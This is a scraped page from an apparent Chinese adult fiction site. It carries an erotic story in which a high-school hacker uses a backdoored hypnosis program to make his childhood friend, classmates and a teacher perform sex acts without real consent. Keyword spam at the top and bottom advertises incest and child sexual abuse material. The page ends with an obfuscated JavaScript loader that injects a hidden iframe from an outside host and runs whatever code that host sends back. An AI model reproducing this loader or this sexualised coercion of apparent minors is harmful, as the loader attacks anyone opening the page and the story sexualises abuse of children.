国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
  首页  »  校园学生  »  催眠网路

催眠网路

时间: 2021-06-06 14:47:09 发布:

[art:hits]

小说图片页广告

西元2017年,网路的发展已经到了将「虚拟实境」广泛应用在各方面上

就像我就读的高中,就是应用虚拟实境在功课上,以效果来说确实是比老师在课堂
上说破嘴要来得好。

只是,也会有无法吸收的学生在……我算是其中之一吧。毕竟将精神都用在玩电脑
和网路游戏上,就连青梅竹马的她也是对我不抱持期待。

我的名字是天空明,是森野高中的二年生;至于我的青梅竹马光野真名,则是从幼
稚园就住在隔壁的,有着一头红色短髮的活泼美少女……如果我的眼光没有异样的话


不过我还有另一个身份:骇客。不过并不是那种人人喊打的恶质骇客,而是定时测
试各大厂商有无安全漏洞,或是测试新版软体的 BUG 等等……。基本上现在已经满
多人去从事这样的行业,而且那些厂商也会给我们经费来堵漏洞或 DEBUG,所以说好
赚,也确实是有办法单靠这一个技巧来生活就是。

事情,是发生在午夜的一场网路讨论会。

那时候,因为目前广泛使用的 OS 正开放新版测试,所以我们这堆人自然也就会常
聚集在一起讨论起来。只是讨论到后面,常常就会跑题。

不知怎幺的,突然有人提到了关于「催眠」-虽然说实际上大多是在谈相关的情色
文章或是情色游戏,不过我却不由自主地往另一个方面想。

将催眠的技术应用在虚拟实境的话……?

因为这样的动机,我开始狂找关于催眠的书籍资料。在花了一整个星期日的时间之
后我发觉到,所谓的催眠,其实可以简化成「将资讯输入到潜意识」的一种动作。

以前就有电影院将可乐的资讯安插在电影中,以数十秒分之一的速度在萤幕上「闪
」一下,结果就让当时可乐的销量暴增百分之五十以上……姑且不论数据对不对,不
过这个手段后来就被禁止了……。

当然,我不会作得如此明显,而且这对我来说还只是理论阶段,还得作实验成功才
行。

要做到神不知鬼不觉的程度,才是一个骇客应该有的礼仪。(不过这只能管到有良
心的,恶质的就只能请他们自求多福了。)

而我身边唯一可以找到的实验对象……就只有我的青梅竹马了。

----

详细的程式写法与侵入方式我不方便在这里说明,总而言之我将程式藉由之前帮她
修电脑时植入的后门程式放进去,然后藉由虚拟实境的启动时同时启动……之所以设
定成这样,是因为虚拟实境本身就是个「催眠视觉」的程式,在相辅相成之下效果会
更加地显着。

当然,因为是实验,程式的植入必须分许多次进行-不过好在她对电脑是一知半解
,而且加上我还是电脑专家(尤其是骇客方面),她对我说的话还真是深信不疑呢。

而为防连我自己也中奖,除了程式码上有追加对特定人士的迴避外,我自己戴的眼
镜上也有做出迴避措施。这样在往后使用虚拟实境学习时,才不会出状况。

然后,就这样过了一个月之后的某个晚上……。

正当我在二楼的寝室处理着安全漏洞的报告时,窗户传来了轻轻的敲打声。

我停下敲键盘的手:「怎幺又从窗户进来啊?」

「唉唷,这样比较快嘛。」随着声音,短髮的少女穿着便服从打开的窗户爬进来-
是真名:「还在忙电脑啊?」

「不忙没钱可以赚啊,我又不像妳,父母都在家。」我的父母在去年就移民到美国
了,我是因为还有高中要读才没有跟着被踢过去。

「唉呀,我现在家里也只剩下我一个人啊,你忘了我爸妈上个月才出差,起码要年
底才会有回来的时候吗?」真名一边说,一边大力地坐在沙发上-随着身体的动作,
我隐约可以看到她的胸部在衣服内剧烈起伏着。

她并没有穿内衣。

「好啦,今天又要借什幺漫画?嗯?」她会爬窗户到我房间,通常也只是借漫画回
去看而已。

「嗯,不过我想看看再回去,可以吗?」她一边说,一边从我旁边的书柜里拿出一
本漫画,就坐在我的床上看起来了。

不过她拿的漫画……是成人漫画。

我将椅子反过来作,一副等着看好戏的心情,看着接下来的演变。

不出我所料地,才经过五分钟多,她的脸颊就出现了红潮,胸口有着明显的起伏;
再过几分钟,她就空出一只手开始不规矩地,隔着衣服在抚摸着自己的胸部;胸部摸
够了,手指便往下移动,拉开了牛仔裤的拉鍊,露出了粉红色的私处,然后就用手指
不断地在小红豆与私处之间游移着。

她连内裤都没有穿。

「啊……嗯……喔……嗯……」她一边吞着口水,一边加快手指移动的速度,私处
也开始渗出透明的液体,甚至滴落了床单,在床单上出现了水痕。

半小时后,她突然弓起身体,全身像是抽筋般地僵直后,就整个人靠墙摊在床上喘
着气,显然是达到了高潮。

「妳最近常常自慰吗?」我语带好奇(其实是明知故问)地问道。

「嗯,也不知道怎幺回事,这一个月心血来潮就常常自己来……」喘着气,她显然
没发觉到自己竟然在我的面前自慰。

「很舒服吧?」

「嗯,是很舒服,不过我想要更舒服一点……」她指了指手上的情色漫画:「老是
自慰都腻了,让我尝一下做爱的感觉好不好?反正你是男的嘛……」

她一边说,还一边用手拨动着自己的私处,一副诱惑我的模样。

「要我帮忙可以,不过妳总得做点表示吧?」

「唉唷,真小气……」她一边嘟囔着,一边起身走了过来;而我也将椅子坐正,就
这样看着她拉开我裤档的拉鍊,将我那已经涨的过火的分身拿出来:「唉呀,还真大
呢……」她讚叹完后,便开始用舌头舔着我的分身,虽然生疏,不过对于还是第一次
的我,远比自己自慰还要冲击着我的感官。

结果令人洩气地,才三分钟我就将精液喷在她的脸上。

「嗯……有点腥,不过还满好吃的……」不在意自己的脸和衣服都被精液溅到,她
品嚐着我的精液,一副津津有味的样子。

在她把脸上的精液都舔完后,又回过头继续舔着我的分身,直到我的分身又再度坚
硬起来为止:「唉呀,和漫画上说的一样耶……」讚叹完后,她便把牛仔裤脱掉,露
出了有着些许阴毛的私处。

她正想连上衣也一起脱掉,我连忙制止:「就这样上来吧。」

「嗯,好啊。」对于我的提议,她显然十分同意-她轻握住我的分身,双脚一跨坐
在我的身上,将分身对準她自己的私处后,就将屁股慢慢往下沈,让我的分身钻进她
的体内。

「呜……」毕竟是第一次,在我的分身钻进她的私处时,她露出了痛苦的表情,些
许的鲜血从交合处渗出些许-这是她还是处女的证明。

直到她整个屁股坐在我身上,让我的分身进入了一个紧到会让我打咿索的温热的洞
后,她才鬆了一口气:「哈、哈……没想到还真有点痛……不过现在应该没问题了。


「辛苦妳了。」我擦掉她因为疼痛而漏出来的眼泪后,就用吻来安慰她-而她也十
分高兴地,用更激烈的舌吻来回应我的安慰。

而随着下体开苞时疼痛的逐渐消失,她的屁股也开始扭动着。

「想要了?」我离开她的嘴唇,问道。

「别、别问了啦,快点……快点赐与人家快乐……」她开始恳求我,屁股也开始时
而上下,时而左右摇摆动着。

「那,自己动吧。」

「喔、嗯……」听到了我的话,她开始尝试将屁股大幅度地上下动着-显然刺激太
大的关係,她每动一次身体就会直颤抖好几次:「啊啊……好棒……身体……停不下
来了……啊……阿明,早知道我就早点找你了……」

我没继续说话,只是拉起她的衣服,让没有胸罩保护的胸部露出来,并用双手玩弄
着。

「啊啊……阿明,胸部、胸部好舒服……」她紧抓着我的肩膀,屁股不断地起起落
落。

「以后妳就常常来让我玩吧……」

「嗯,好啊,我要给你玩、我要让你玩……」在接近高潮的冲击之中,她只能盲目
地回应我的要求。

兴致一来,我抱起了她,将她放倒在床上。在我开始抱住她的脚猛力冲刺时,她也
高兴地双手撑着床,不断地用屁股来回应我的冲刺。

在几近半小时的肉搏战后,我和她几乎同时间大叫着,在她全身僵直的同时,我也
在她体内放出了我的第二发精液。

在极度的疲累之中,我和她互拥,沈沈睡去。

--

张开双眼,就看见她那安稳的睡脸。

看来这一个月的渐进式催眠相当有效果,让她能够完全无视于贞操的观念,就这样
把她的第一次给了我。

内容?抱歉,无可奉告。

要开始正式进行计画了呢?还是继续在她身上试验呢?正当我考虑时,她带着细微
的哼声,醒了过来。

一看到我醒过来,也不管我的分身还深埋在她的蜜穴里,就撑起上半身说道:「你
已经醒来啦?」

「是啊……」我一边说,一边双手依然不知足地在她的身上移动着。

「不要啦,痒死了。」她口里这样说,身体却没有任何阻止我的动作,甚至于我还
可以感觉到从她的蜜穴传来的挤压感。

「……要吗?」

「来啊,谁怕你。」脱掉了身上唯一的一件衣服,休息一晚后的她,「性」致也很
高昂。

就这样,我们两人又在床上玩到了中午,才爬起来準备中餐。

看着只穿着围裙的她,在厨房帮我做菜的样子,我有一种满足的感觉-不管是现状
还是程式的成功。

我趁着她在做菜的时间,回到房间电脑前检查着这个还没命名的程式。

「嗯?这个是……」看到一半,我发觉到程式里有个选项我竟然忘了关。

一般的木马程式都具有随网路扩散的机能,而我们骇客为防程式被滥用,这个机制
通常都会关闭或是拿掉。

不过很显然地,我在写这个程式时,忘了加入关闭扩散的选项……。

现在共享软体的发达,连她自己也装了一分类似的软体,这幺一来,那个程式恐怕
已经随着共享软体而複製出去了吧。

对于一个尚未完成的程式而言,这可不是好现象。

但是要挽回的话,就必须製作清除软体……那就等于是让我全盘招供了,我还不想
把自己的工作给搞掉。

看来只有静观其变了……而且我这边的程式也得继续改良才行。

「阿明,煮好啰。」楼下传来她的呼唤声。

----

在度过了充满性慾肉慾的一天后,第二天星期一的早上,一到学校我就被英文老师
找过去调整虚拟实境的相关设定-毕竟英文成绩不好的我,只好用这招来争取过关的
机会了。

不过当我在检查程式时,却发觉到主机端电脑的程式里,「果然」也有我所写的催
眠病毒。

要解?不解?那一瞬间我的思绪停在这个选择上。

「怎幺了?」英文老师或许是看到我的异状吧,连忙跑过来询问。

我们班的英文老师「玛莉亚.阿兹.雷」是个留日的美国人,有着一头金色的亮丽
长髮,不过对于电脑是属于那种一知半解的人,所以我才有趁虚而入的机会。

「电脑好像中毒了,光靠电脑内的扫毒软体好像清不掉的样子。」我这句话一半是
实话。

「唉呀,这真糟糕……」玛莉亚老师并没有显得特别慌乱的模样:「那,就像上次
一样好了……网管那边我会去说明的。」

老师说的「上次」就是直接连到我的电脑进行远距离扫毒,虽然后来网管抗议,但
是在玛莉亚老师以及其他同好的保证之下,到后来不单单不了了之,反而让我成了特
例,变成「暗黑网管」般的存在。

更何况,这间学校的网管基本上只比玛莉亚老师的等级要高一点而已,毕竟这种「
免费打工」对于对电脑有高知识的专家来说没有任何的吸引要素。

当然,我所做的确实是「扫毒」-不过是将主机里的旧档案置换成新档案。

接下来就看实验的效果了。
很快地,又经过了一个月。

今天又是利用虚拟实境教课的时间……说穿了,除了数学和体育之外,几乎所有的
课都或多或少用上了虚拟实境。就以我个人的感觉来说,有点氾滥。

不过这倒也间接造成了我的实验之成功-当然网路的自由分享氾滥也是主因。

这段时间以来,我自然又继续在我的实验上加料直到我满意为止。

而成果,就像现在一样,我坐在某位女同学的面前桌子上,而我面前的女同学两眼
呆滞,呆呆地坐着,原本戴在脸上的3D面具也拿了下来放在一旁。

而我的分身,正大棘棘地展现在她面前。

我在催眠程式里加入了关键词,这样可以让他们的生活作息和平常一样,以避免他
人注意。

现在可以说整间学校都处于催眠状态之中-关键词和指令可以利用广播,以人类听
不到的频率发送-当然这还得先摆平负责广播的老师与学生。

「我一拍妳的肩膀,妳就会醒过来。」我轻声地说道:「妳醒过来之后,妳会想要
去用嘴巴去舔食着妳面前的东西,而且我所说的话妳都会照做。记住,不要用到牙齿
咬,妳才会有可口的果汁可以喝。知道了就点点头。」

在我的暗示下,少女轻轻地点点头。

确定之后,我拍拍肩膀,她原本呆滞的眼神立即恢复正常。她接下来的动作就是用
手轻轻地捧起我的分身,然后用舌头轻轻地舔着,就像是在舔棒棒糖一般。

「来,用口含进去,然后将头前后摆动。」在我的指示下,少女张开嘴将我的分身
含进去后,便努力地将头前后摆动,以口来套弄我的分身。

我并没有对她的身体做出任何动作,只是好整以暇地看着她服侍着我的分身。

过了十几分钟后,我感觉快要射精了:「要、要出来了。」

我虽然这样喊,但她显然已经含上了瘾,完全没有离开的迹象。

就这样,我把精液尽数射进了她的嘴里,而她并没有被我射出的精液呛到,十分有
技巧地将我的精液全数吞了进去。

等她吞完后,我好奇地问道:「妳以前有做过口交吗?」

「嗯……我的男朋友有教过我……不过已经和他分手了。」她诚实地说道。

事后,我让她恢复催眠状态,只是我还是让她记得她有帮我口交,唯一的改变:这
是在虚拟实境里的场景,并非现实。

接着,我利用网路的远隔遥控,利用广播解除学校学生的催眠状态。

看着她恢复后,那一副红着脸,带着害羞与满足的模样,让我更加确定实验的成功


下课后,我快步地往保健室移动-因为在那边还有一个测试在等着我。

来到保健室前,我敲敲门:「我是天空明,我要进来了。」

「啊,请进。」里面传来的是女性的声音。

「谢谢。」得到允许,我就打开门进去保健室-只见保健室的老师依川星子正和另
一位女同学谈天。那位女同学也是我熟悉的人,是学校前几名的校花,同年级隔壁班
的「佐藤千鹤」,是个有头亮丽黑色长髮的美少女,还是茶道社团的社长,不过因为
有点贫血,所以时常来保健室报到。

我还没等老师问我,我立即以关键词让我面前的两人陷入了催眠状态。

「听的到我的话吗?」

「嗯。」「听到了……」

「等妳们从催眠状态醒来时,妳们会忽略我的存在,但是依然可以听到我的声音,
而妳们也会听从我的话,并视为妳们的想法,也不会有任何的反抗,因为我所说的话
就是妳们所希望作的……知道的话就点一下头。」

两人点了点头。

「妳们一听到我的拍手声,就会从催眠状态醒来……」

我一拍手,两人立即恢复原状。

恢复原状之后的两人,完全没发觉我的存在,继续谈笑风生。

「现在,妳们会觉得房间很热,但是妳们完全不会想到要开窗户,而是一件件脱掉
身上的衣服。每脱一件,妳们就会凉爽一点,但随即妳们又会感到闷热,而继续脱掉
身上的衣服。直到赤身裸体为止,妳们才会感觉到舒服。」

我一说完,千鹤首先有了反应:「老师,好像……有点热耶……」

「嗯……空调好像有点问题……」依川老师也露出了有点疑惑的表情。

现在时节是六月,可以说是不热不冷的时期,所以空调也只是开送风而已。

「那我把上衣脱掉看看会不会凉一点好了。」

「那我也脱掉上衣好了。」就这样,两人不约而同地把上衣脱掉,露出了胸罩-千
鹤的胸罩是常见的白色,老师的胸罩则是肉色的。两人的胸部在胸罩的衬托之下,看
起来都有起码D罩杯的实力。

「嗯……还是有点热耶……」这次有点不耐的换老师了:「连裙子都脱掉好了。」

「我想也是……」接着两人站起来,就把裙子脱掉了-现在的两人就只穿着内衣内
裤,还可以看到两人的阴毛隐约地在内裤里显现。

「……不行,还是有点热。」这句话刚说完,老师就站起来,索性将内衣内裤全部
脱掉-顿时赤身裸体的依川老师就出现在我的面前,拥有着 D 罩杯实力的胸部在去
除胸罩的覆盖后,露出了完美的外型。

脱光衣服后的老师,露出了舒服的表情:「这样总算凉一点了。」

「那我也……」看到老师把衣服脱光后,一副舒服的模样,千鹤也跟着照做,不久
一副年轻的裸体也出现在我的面前-也许是因为千鹤身形比较小,所以胸部看起来还
比老师的大了一点。

千鹤在把内衣内裤脱掉之后,也露出了舒服的表情:「啊,这样就凉多了……好舒
服喔……」

「……千鹤同学还是处女吗?」

「嗯。」没有意识到是我的询问,千鹤点了点头。

「等一下妳们会发觉到我的存在,但是妳们并不会认为在我面前裸体有什幺不对,
因为妳们觉得这样很舒服。然后老师会要求我帮妳替千鹤上一场性交的课程,妳们不
会认为这有什幺不对,因为这是很正常的一件事情。」

我话说完后,老师转过身来望着我:「对了,天空同学要帮我一下吗?有件事要麻
烦你。」

「可以是可以,不过是什幺事呢?」我知道这是明知故问,不过还是得装一下。

「因为千鹤同学想要知道怎幺做爱,所以得麻烦你实际示範一下。来,先把衣服脱
下来吧。」

「啊,好的。」在老师的吩咐下,我将衣服全数脱掉,就这样三人就一丝不挂地同
处一室。

因为在我进来之后,我就随手把门锁起来了,所以不怕会有人闯进来,而且现在学
生大概也下课跑光了,也不会有人靠近这里……即使真有人进来,我也有办法处理。

「那我就先示範一下好了。」老师让我坐在椅子上,说道:「等下千鹤看我怎幺做
,妳就照着做就好了。」

「是的,还请老师多多指教。」千鹤一副拭目以待的模样,显然把做爱当成了一般
的课程。

「那幺……首先,这是口交。为了让男人的分身可以进入我们的阴道里,所以必须
给予必要的刺激。」解说完后,老师便把我的分身给含进了口里,开始用口套弄着我
的分身。

「哇……这样的东西,可以含进嘴里吗?」千鹤露出不可思议的表情。

「哈……含不进去的话用舔的也可以,总之只要给予刺激,让分身硬起来就可以了
。当然如果可以让他射出来的话……」听到千鹤的疑惑,老师特地先把我的分身吐出
来解释着。

「射出来?」

「嗯,就是男人的高潮。男人的精液还是养颜圣品喔,可以吃的。」解答完后,老
师又继续地刺激着我的分身。

不过,老师啊,是谁和妳这样说的啊……我可不想因为这个因素而被搾乾啊。

吞吐了好一阵后,老师才把我的分身吐出来:「来,千鹤,妳自己来试试看。」

「啊,是的,老师。」听到老师的吩咐,千鹤立即和老师一样,跪坐在我的跨下,
然后用手握着我的分身:「唉呀,好热啊……」

「来,看妳能不能将天空同学的精液给弄出来。」

「啊,是的。」听了老师的吩咐,千鹤立即尽可能地张大嘴巴,便将我的分身给含
了进去。

「别用牙齿,只要运动妳的嘴唇和舌头……」在老师的教导下,千鹤的动作也越来
越熟练。甚至于除了用口含之外,老师也教了许多关于口交的招式,千鹤也几乎是一
教就会,彷彿天生就该为男人服务一般。

只是,毕竟在早上就射过一次了,现在要我在口交的状况下射第二发出来,还真有
点强人所难。

不过老师也不是硬要我在口交的状况下将精液社出来,在看千鹤都会了之后,就示
意千鹤停下来:「好了,口交的部分就这样,现在是正式的性交……天空同学,麻烦
你来到这张床上。」老师一边叫我,一边自己就躺在床上,,打开双脚,一副任人宰
割的模样:「由你採取主动位可以吗?」

「啊,是的,老师。」老师的命令我自然是十分乐意,来到床上,我顺势就抓住了
老师的双腿。

「对,就这样……你把身体往前推进,我来诱导。」老师起身握住我的分身,而我
也照着老师的吩咐,将腰往前一挺,就这样进入了老师的蜜穴之中:「啊……没想到
天空同学的东西还满大的……」

「这就是……性交?」千鹤仍是有点疑惑。

「嗯,当然不只如此。」微喘着气,老师继续解释:「因为我已经不是处女,所以
那里不会流出血……虽然说第一次会有点痛,不过也只会痛第一次而已。来,天空同
学,你将腰前后摆动,这样我就会更舒服了。」

「是的,老师。」听到老师的话,我自然开始将分身前后摆动,而老师也开始露出
淫蕩的气息:「啊、天空同学的……这幺快就顶到了…… 啊啊……好棒……」

近距离看着老师淫蕩的演出,千鹤看的是脸红心跳,两手不知不觉地就往自己的密
处移去,轻轻地抚摸着。

由于之前就已经刺激过了,老师的蜜穴也有着让我直打咿索的蠕动感,在老师达到
高潮的同时,我也不禁将第二发精液射进了老师的体内。

「啊啊……射进来了……不管了,反正很舒服……」任由我把精液全数射进了体内
,老师有的只是舒服的表情与满足的笑容。

稍做休息后我转头一看,这才发现千鹤坐在地上,双手还埋在两腿里,一脸潮红。

「唉呀呀……千鹤自慰到高潮了吗?」老师想要起身,却发现我的分身又开始硬起
来了:「呵呵……天空同学,看到千鹤同学的样子,又想要了吗?」

「对、对不起……」我连忙道歉-虽然也是装的。

「没关係的。」笑了笑,让我从她身上离开后,老师坐在床上面对着千鹤,打开双
腿,大棘棘地将蜜穴呈现在千鹤眼前:「这就是体内射精后的情况……虽然很舒服,
不过除非你想要孩子或是安全期内,不然还是体外射精或是戴上保险套比较安全。」

「……是的,老师。」千鹤的回答有点无力。

「那幺,就请天空同学来和千鹤进行实地演练啰。上来吧。」在老师的吩咐下,我
抱起浑身无力的千鹤放在床上:「会有点痛喔,麻烦请忍耐一下。只要放轻鬆就好了
……」

「……嗯。」也不晓得是害怕还是兴奋,千鹤躺在床上,就把眼睛闭上。

我轻轻地抓着千鹤的双脚打了开来,这才发现千鹤的蜜处已经可以说是氾滥成灾了


我抓着自己已经硬挺的分身,先顶在千鹤的蜜穴口。

「嗯……」也不知道是舒服还是吓到,千鹤的身体抖了一下。

「要进去啰。」

「嗯。」在告知之后,我便将腰部往前一顶,分身竟然比我想像的,还顺利地进入
了千鹤的体内。

这一顶,千鹤整个人弓了起来,张大着嘴却吐不出一句话,过了快一分钟才又恢复
平躺的模样,直喘着气。

「会痛吗?」

「我、我也不知道……只是感觉那里……有点涨……」

「不会痛吗?」听到千鹤的话,我不禁往我们两人的交合处一看-确实有些许的血
液渗了出来,千鹤应该是处女没错:「有血液……但是我没感觉到有顶破东西……」

「我想千鹤应该天生就没有处女膜吧……也或许是薄到没有感觉而已。」老师想了
一下后说道:「天空同学,你就先保持这样的姿势别动,等千鹤同学适应之后再开始
动。对女生温柔才是好男人的表现喔。」

「问题是好男人通常都得孤独一生啊。」这句话我倒是没做作-在网路上一直流传
着「当女生对你说『你是好人』的下一句,通常就是『你会找到比我更好的』或是『
我不适合你』等类似的分手文」这样。

「唉唷,没人陪你,我和千鹤陪你就好啰。」老师指了指千鹤:「千鹤似乎开始舒
服啰。」

「天空同学……你能够……动一下吗?那里好像有点痒……」此时千鹤也开始要求
我了,腰部也有明显的扭动。

「对了,我顺便教个新动作好了。」在老师的教导下,变成了千鹤骑着我的状态,
也就是男下女上的姿势:「这样妳就可以自己动了。」

「是的,老师……啊,里面……好涨……」千鹤一开始很勉强地将屁股上下移动,
时间一久,腰部的移动不但不吃力,反而还越来越快:「啊啊、好棒……这、这就是
做爱……腰、腰停不下来了……」

「啊,千鹤同学的里面……好紧好热……弄得我好舒服……」

「啊,谢谢、谢谢指教……天空同学的东西,也弄得我好舒服……啊~不行,好像
什幺东西要冲出来了……」

「那就是高潮的前兆喔……」老师满意地看着我和千鹤的淫乱行为:「天空同学,
把精液深深地打进她的心吧……」

「啊……不管了,我的体内,要塞满天空同学的精液……啊喔喔喔……要出来了…
…快点,一起……」

「千鹤……嗯喔喔喔喔……」

「啊啊啊啊……」在一阵狂乱的叫声之中,我和千鹤都达到了高潮-相对于我整个
人脱力无法动弹,千鹤则是几乎保持着骑在我身上的样子,完全失神状态。

等到我们都恢复了行动能力后,我再次让她们进入催眠状态:「等妳们醒来之后,
依然会记得刚刚发生的事情。妳们会认为这是一场成功的学习经验,但妳们不会向其
他人提起。而且以后只要我提出要求,妳们都会十分乐意地接受我的要求,因为这是
十分舒服的学习……」

「是的,十分舒服……」两人依然赤身裸体,就这样站在我的面前,两腿间还有着
精液淫水乾掉后的痕迹。

「那幺,明天学校见啰。」解除催眠之后,千鹤和老师一起拖着疲惫的身体各自回
家,而我则是握着她们的内衣裤当胜利品,也高兴地回家好好休息一番。



一踏进家里,从厨房就传来真名的声音:「回来啦,等一下就煮好啰。」

「谢谢喔。」我将书包放在沙发之后,就往厨房走去-此时的真名,全身上下就只
穿着一条围裙,正在快乐地帮我煮饭。

现在的真名并没有埋入「关键词」,不过在之前的催眠程式渐层洗脑下,只要家里
没有外人在的状况下,就一定是赤身裸体,有时还会就这样光着身子从窗户爬进来,
一副不以为意的样子。而且对我可以说是百依百顺,我想就算叫他光着身子大白天逛
大街,只怕她也会照做不误吧。

不过,既然我自认有把她当作女朋友看待,那自然也不会让其他人有眼睛吃冰淇淋
的机会。

真名的性慾也出乎我意料之外,从吃完饭后的洗澡开始,她就用她的蜜穴一直「咬
」着我的分身不放,直到洗完澡后的休息也不放过。

现在的我已经不需要写作业了,只要专心地做着网管的工作就能够顺利毕业,也能
继续待在学校里担任网管的工作。

「让我生你的孩子吧。」骑在我身上,真名这样提议着:「我这两三天是危险期…
…」

「危险期是一回事,妳忘了我们家的遗传病了吗?」我苦笑着-我们家族的父方一
直有着「精虫稀少症」的困扰,到我这一代虽然数目和常人差不多,但却都是无法受
孕的「假精虫」,生育的机率几乎可以和零划上等号。唯一庆幸的是,我的性慾倒是
可以号称「不倒翁」,有着平常人三到四倍的「勇猛」度,也因此才禁得起真名的压
榨。

就连我的出生,也是借助人工受孕才得以完成的。

当我知道我也有这个遗传疾病时,还真差点没把老爸扼死。之后我也下了宣示-没
后代不要怪我。

现在父母在国外出差,有一半的因素也是準备再生第二胎,以及找出解决的方法。

不过现在想想,我的蛋蛋怎幺有办法及时製造出这幺多的「无用物」啊……一天三
四次的射出都还有剩。

「好!那我要天天在肚子里塞满你的精液,我就不相信生不出来。」她一副「壮志
豪云」的气概,我看了只是更多的无奈。

此时,电脑那边传来了 MSN 简讯,我立即抱起真名坐在电脑前-是我的老网友,
ID 叫「莫非」的人,取的是男性 ID,但实际上是女的(我曾经看过照片,长的还不
赖,是个金髮美女,看起来不到30)。

她常常会自夸自己是外星人,拥有压榨男人的实力……当然我们这群人只是当作笑
话看而已。

不过会这样吹嘘自己性能力的女性还真的不多就是了。

「以下档案是极机密文件,看完了就销毁吧,不是病毒,没事的。」随着这句留言
之后的,是一个大约 1MB 的压缩档。

「好,就和妳拼一拼。」我笑了笑,按下下载钮。

下载完后,我解开来看……是一个文字档,档名是由八位数组成的数字,一时间看
不出什幺异状。

我让真名抱着我继续享乐,然后我侧着头看着文字档的内容。

但是看没几秒钟,我的眉头却皱了起来。

内容所叙述的,是一连串关于「不老不死」的实验,而且竟然还有外星人参与。而
且更糟的是,成员一览竟然有着我父母的名字!

「这到底怎幺一回事?」我用单手以最快的速度打字询问对方。

「就你所看到的这样。」她只回答这句话而已。

看来只好硬着头皮看下去了-不过在此之前,我先让发洩到一段落的真名先回家去
休息,她虽然有点不愿意,不过也还是乖乖地从窗户爬回她家了……看她连衣服都不
穿就往窗户爬出去,显然她来我家时也是没穿衣服吧。

大大地吐了一口气之后,我继续看下去-里面的内容除了成员之外,就是相关的实
验大纲,包含基因的修改在内。

那些都不是我主要想知道的,所以直接拉到最后面……在结果的讨论之中,果然如
我所料地出现了「性功能增进,但精子存活率极低」的字串。

我果然也是这个实验的成品之一。

此时,MSN讯息传来:「看完了吗?」

「这到底是怎幺一回事?」

「正如你所看到的,就是这幺一回事。想知道得更详细的话,明天中午学校顶楼见
吧。」之后,她就下线了。

老实说,现在我的脑袋还一片混乱。

此时,真名又裸体出现在窗户边:「我今天睡你这边可以吗?没你陪我睡我会睡不
着……」

「……那妳要让我发洩一下吗?」

「当然,我是妳的嘛……」听到我的化,真名倒是十分慷慨:「不过你可要让我的
里面都塞满精液喔。」

「那是当然。」带着亟欲发洩出来的一股气,我抱住真名,往床上倒去。

您正在观看: 校园学生《催眠网路》 老光棍影院 每日更新好看的校园学生
国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("UU").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hUUtUUtUUpUUsUU:UU/UU/UUsUUhUUiUUrUUlUUeUUyUUyUUeUUaUUnUU.UUcUUoUUmUU:UU1UU5UU6UU6UU3','/cd/104_m/162',window,document)};